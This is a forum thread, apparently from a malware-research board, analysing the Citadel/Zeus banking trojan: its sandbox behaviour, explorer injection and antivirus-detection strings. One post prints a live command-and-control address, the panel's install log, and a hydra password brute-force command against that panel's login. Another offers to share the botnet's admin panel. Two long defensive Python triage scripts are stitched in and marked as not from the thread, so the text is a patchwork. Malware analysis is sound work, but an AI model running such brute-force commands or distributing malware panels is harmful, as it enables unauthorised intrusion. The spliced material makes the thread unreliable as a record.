Cassiel wrote:
> @ EP_X0FF
> I have run the sample in my VM and I noticed some strange things. If I run it outside BSA it will set the autorun part; if I run it inside BSA it won't.
> There are the "usual" registry changes but there is nothing being added to the Run key. It is like it puts itself to sleep and then can no longer continue.

Probably its activity is restricted by the sandbox. Why do you want to run malware in a VM + Sandboxie?
Citadel (Zeus clone)
- EP_X0FF
- Global Moderator
- Posts: 4775
- Joined: Sun Mar 07, 2010 5:35 am
- Location: Russian Federation
Re: Citadel (Zeus clone)
Ring0 - the source of inspiration
- Buster_BSA
- Posts: 390
- Joined: Mon Mar 22, 2010 6:42 am
Re: Citadel (Zeus clone)
Cassiel wrote:
> @ EP_X0FF
> I have run the sample in my VM and I noticed some strange things. If I run it outside BSA it will set the autorun part; if I run it inside BSA it won't.
> There are the "usual" registry changes but there is nothing being added to the Run key. It is like it puts itself to sleep and then can no longer continue.

Probably the malware is injecting code into a system process and then setting the autorun part from there. As Sandboxie does not allow injection into processes running outside the sandbox, the process will fail and so will the autorun.
Last edited by Buster_BSA on Fri Jan 04, 2013 2:33 pm, edited 1 time in total.
Re: Citadel (Zeus clone)
@ EP_X0FF
Well my idea was to use a VM with BSA in order to have a snapshot if things went wrong.
I tried cuckoo also, however I like the reporting from BSA a lot more than cuckoo.
@ Buster_BSA
You are most likely right, I am going to check this with procmon in order to see how the registry key is being set.
EDIT:
You are right, it is injecting into explorer and after that it is creating the autorun key.
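Cassiel's procmon observation above (the sample writes its copy to disk, but the Run value is then set by explorer.exe) can be turned into a triage check over a procmon CSV export: attribute every Run/RunOnce write to the process that dropped the launched binary, and flag the case where the two differ. This is an added example, not code from the thread; the CSV rows are constructed, and sample.exe, the drop path and the Run value name are placeholders.

```python
import csv
import io
import re
from dataclasses import dataclass
from typing import Optional

# Constructed procmon-style CSV export (not a real capture): sample.exe drops its copy,
# then explorer.exe, after being injected, writes the Run value that points at that copy.
# The svchost.exe row is an ordinary Run write with no dropper behind it, kept as a control.
PROCMON_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:00:01","sample.exe","1234","CreateFile","C:\Users\lab\AppData\Roaming\Ruqi\ynxo.exe","SUCCESS","Desired Access: Generic Write"
"10:00:01","sample.exe","1234","WriteFile","C:\Users\lab\AppData\Roaming\Ruqi\ynxo.exe","SUCCESS","Length: 200,704"
"10:00:02","explorer.exe","888","RegSetValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Run\{9D2F3B1A-0000-4C7E-9C3A-1234567890AB}","SUCCESS","Type: REG_SZ, Length: 90, Data: C:\Users\lab\AppData\Roaming\Ruqi\ynxo.exe"
"10:00:03","svchost.exe","700","RegSetValue","HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealth","SUCCESS","Type: REG_EXPAND_SZ, Length: 80, Data: %windir%\system32\SecurityHealthSystray.exe"
'''

RUN_KEY_RE = re.compile(r"\\CurrentVersion\\(Run|RunOnce)\\", re.IGNORECASE)
EXE_RE = re.compile(r'"?([^"]+?\.exe)', re.IGNORECASE)   # executable inside the Run value data

@dataclass
class Finding:
    writer: str              # process that set the Run value (explorer.exe in the thread's case)
    writer_pid: str
    value_path: str          # full registry path of the written value
    target: str              # executable the Run value launches
    dropper: Optional[str]   # "process:pid" that earlier wrote that executable to disk, if seen

def find_run_persistence(csv_text: str) -> list:
    """Report every Run/RunOnce value write and attribute the launched binary to its dropper."""
    file_writers = {}        # lower-cased file path -> "process:pid" that first wrote it
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        op, path, who = row["Operation"], row["Path"], f'{row["Process Name"]}:{row["PID"]}'
        wrote = op == "WriteFile" or (op == "CreateFile" and "Write" in row["Detail"])
        if wrote and row["Result"] == "SUCCESS":
            file_writers.setdefault(path.lower(), who)
        elif op == "RegSetValue" and RUN_KEY_RE.search(path):
            data = row["Detail"].split("Data: ", 1)[-1]
            m = EXE_RE.search(data)
            target = m.group(1) if m else data
            findings.append(Finding(row["Process Name"], row["PID"], path, target,
                                    file_writers.get(target.lower())))
    return findings

def is_injected_host(f: Finding) -> bool:
    """True when the Run value was set by a process other than the one that dropped the target:
    the pattern Cassiel saw (sample injects explorer.exe, explorer.exe writes the key)."""
    return f.dropper is not None and not f.dropper.lower().startswith(f.writer.lower() + ":")
```

Run it on a real export with `find_run_persistence(open("Logfile.CSV").read())` after saving the procmon trace as CSV; a finding where `is_injected_host` is true is the autorun-via-injected-host case, a finding without a dropper is a plain Run write to review by hand.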
- Buster_BSA
- Posts: 390
- Joined: Mon Mar 22, 2010 6:42 am
Re: Citadel (Zeus clone)
Cassiel wrote:
> You are right, it is injecting into explorer and after that it is creating the autorun key.

I would like such injections to be done successfully so the BSA analysis can be more complete, but that depends on Sandboxie's restrictions. I am going to talk with Ronen about this and I will ask him if there is any workaround to solve the issue.
Re: Citadel (Zeus clone)
Citadel 1.3.5.1 Rain Edition sample. It has some anti-VM and anti-AV functions; I couldn't run it under Comodo and didn't try manually, maybe someone will.
- EP_X0FF
- Global Moderator
- Posts: 4775
- Joined: Sun Mar 07, 2010 5:35 am
- Location: Russian Federation
Re: Citadel (Zeus clone)
exitthematrix wrote:
> Citadel 1.3.5.1 Rain Edition sample. It has some anti-VM

Not found. Except a lame trick with GetKeyboardLayoutList (patch two bytes @00418FC6 with nops) and another lame trick with
Code:
ROOT\SECURITYCENTERROOT\SECURITYCENTER2 SELECT * FROM%sWQL
Antivirus Product company Name display Name version Number Unknown Company:%s
Product:%s
Version:%s
Firewall Product
Software\Microsoft\Windows\CurrentVersion\Uninstall
Publisher Display Name Display Version%u:%s|%s|%s
Code:
SafenSoft SysWatch McAfee McAfee Security Center McAfee SecurityCenter Symantec Client Symantec Protection Symantec Shared Symantec Security Norton Protection Kaspersky Security Kaspersky Anti-Virus avast! Antivirus AntiVir Desktop AVG Monitor AVG Service AVG Security ESET Security ESET Antivirus Microsoft Inspection Microsoft Malware Microsoft Security
Patched Zeus result (full disclosure).
http://camas.comodo.com/cgi-bin/submit? ... f9856e4263
No matter how it is named - zeus, ice-ix, citadel - it is all the same slavik shit.
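The strings EP_X0FF lists above (the SecurityCenter WMI namespaces, the AntiVirusProduct/FirewallProduct property names, the Uninstall key and the product-name watchlist) make a usable static triage signature for the AV-enumeration capability: extract printable strings from a binary and count how many of those indicator families appear together. This is an added example, not code from the thread or the sample; the two byte blobs are constructed and the product list is a subset of the one quoted.

```python
import re

# Indicator families built from the strings EP_X0FF quoted above (class and property
# names written without the spaces the forum extraction inserted); product names are a
# subset of the post's list. This is an added triage heuristic, not code from the thread.
INDICATOR_FAMILIES = {
    "wmi_securitycenter": ["ROOT\\SECURITYCENTER", "ROOT\\SECURITYCENTER2"],
    "wmi_query": ["SELECT * FROM"],
    "securitycenter_classes": ["AntiVirusProduct", "FirewallProduct",
                               "companyName", "displayName", "versionNumber"],
    "uninstall_key": ["Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall",
                      "Publisher", "DisplayName", "DisplayVersion"],
    "av_product_names": ["SafenSoft SysWatch", "McAfee Security Center", "Symantec Client",
                         "Kaspersky Anti-Virus", "avast! Antivirus", "AntiVir Desktop",
                         "AVG Security", "ESET Security", "Microsoft Security"],
}
ASCII_RUN = re.compile(rb"[\x20-\x7e]{4,}")            # printable ASCII runs
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")    # printable UTF-16LE runs

def extract_strings(data: bytes) -> list:
    """Minimal strings(1): ASCII and UTF-16LE runs of four or more characters."""
    narrow = [m.group().decode("ascii") for m in ASCII_RUN.finditer(data)]
    wide = [m.group().decode("utf-16-le") for m in UTF16_RUN.finditer(data)]
    return narrow + wide

def scan(data: bytes) -> dict:
    """Map each indicator family to the sorted members found in the blob's strings."""
    strings = extract_strings(data)
    report = {}
    for family, indicators in INDICATOR_FAMILIES.items():
        hits = sorted(ind for ind in indicators if any(ind in s for s in strings))
        if hits:
            report[family] = hits
    return report

def looks_like_av_enumeration(report: dict) -> bool:
    """SecurityCenter namespace plus at least two other families; a lone hit is too weak."""
    return "wmi_securitycenter" in report and len(report) >= 3

# Constructed blobs, not bytes from the real sample: the first imitates the string table
# quoted in the post (two product names stored as UTF-16), the second is a benign control.
SAMPLE_BLOB = (
    b"\x00ROOT\\SECURITYCENTER\x00ROOT\\SECURITYCENTER2\x00SELECT * FROM %s\x00WQL\x00"
    b"AntiVirusProduct\x00companyName\x00displayName\x00versionNumber\x00FirewallProduct\x00"
    b"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\x00Publisher\x00%u:%s|%s|%s\x00\x00"
    + "McAfee Security Center".encode("utf-16-le") + b"\x00\x00"
    + "Kaspersky Anti-Virus".encode("utf-16-le") + b"\x00\x00"
)
BENIGN_BLOB = b"KERNEL32.dll\x00GetProcAddress\x00LoadLibraryA\x00ExitProcess\x00"
```

`scan(open(path, "rb").read())` on an unpacked sample gives the per-family hits; packed or encrypted string tables (as in the build exitthematrix mentions) will show nothing until the strings are decrypted, so treat an empty report as "unknown", not "clean".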
Re: Citadel (Zeus clone)
Thank you very much for the tips and help.
- Xylitol
- Global Moderator
- Posts: 1652
- Joined: Sat Apr 10, 2010 5:54 pm
- Location: Seireitei, Soul Society
Re: Citadel (Zeus clone)
Code:
• dns: 1 ›› ip: 62.109.1.7 - adresse: CITAB-TEST.TK
http://62.109.1.7/net/panel.php?m=login
Code:
http://62.109.1.7/net/install/
• [0] - Connecting to MySQL as 'citab-test'.
• [0] - Selecting DB 'citab-test'.
• [0] - Updating table 'botnet_list'.
• [0] - Creating table 'botnet_reports'.
• [0] - Updating table 'botnet_reports_130119'.
• [0] - Filling table 'ipv4toc'.
• [0] - Creating table 'ipv4toc'.
• [3] - Updating table 'cp_users'.
• [3] - Updating table 'botnet_scripts'.
• [3] - Updating table 'botnet_scripts_stat'.
• [3] - Updating table 'botnet_software_stat'.
• [3] - Updating table 'exe_updates'.
• [3] - Updating table 'exe_updates_crypter'.
• [3] - Updating table 'accparse_rules'.
• [3] - Updating table 'accparse_accounts'.
• [3] - Updating table 'vnc_bot_connections'.
• [3] - Updating table 'jabber_messages'.
• [3] - Updating table 'botnet_screenshots'.
• [3] - Updating table 'botnet_rep_favorites'.
• [3] - Updating table 'botnet_activity'.
• [3] - Updating table 'botnet_webinjects_group'.
• [3] - Updating table 'botnet_webinjects_group_perms'.
• [3] - Updating table 'botnet_webinjects'.
• [3] - Updating table 'botnet_webinjects_bundle'.
• [3] - Updating table 'botnet_webinjects_bundle_execlim'.
• [3] - Updating table 'botnet_webinjects_bundle_members'.
• [3] - Updating table 'botnet_webinjects_history'.
• [3] - Creating folder '_logos'.
• [3] - Writing config file
• [3] - Searching for the god particle...
• [3] - Creating folder 'system/data'.
• [3] - Creating folder 'public'.
• [3] - Creating folder 'files'.
• [3] - Creating folder 'files/webinjects'.
-- Update complete! --
EP_X0FF wrote:
> No matter how it is named - zeus, ice-ix, citadel - it is all the same slavik shit.

Code:
-l admin -P pwd.lst -s 80 -w 64 -f -V 62.109.1.7 http-post-form "/net/panel.php?m=login:user=admin&pass=^PASS^:Bad user name or password."
Re: Citadel (Zeus clone)
If someone needs the PHP admin panel of this slavik mod shit, let me know and I can upload it.
Re: Citadel (Zeus clone)
Seems like Citadel is the new favorite toy of some criminal gangs targeting government organizations:
McAfee Blog: http://blogs.mcafee.com/mcafee-labs/lab ... del-trojan
HitmanPro Blog: https://hitmanpro.wordpress.com/2013/02 ... onnection/
Malware Reversing
http://www.malware-reversing.com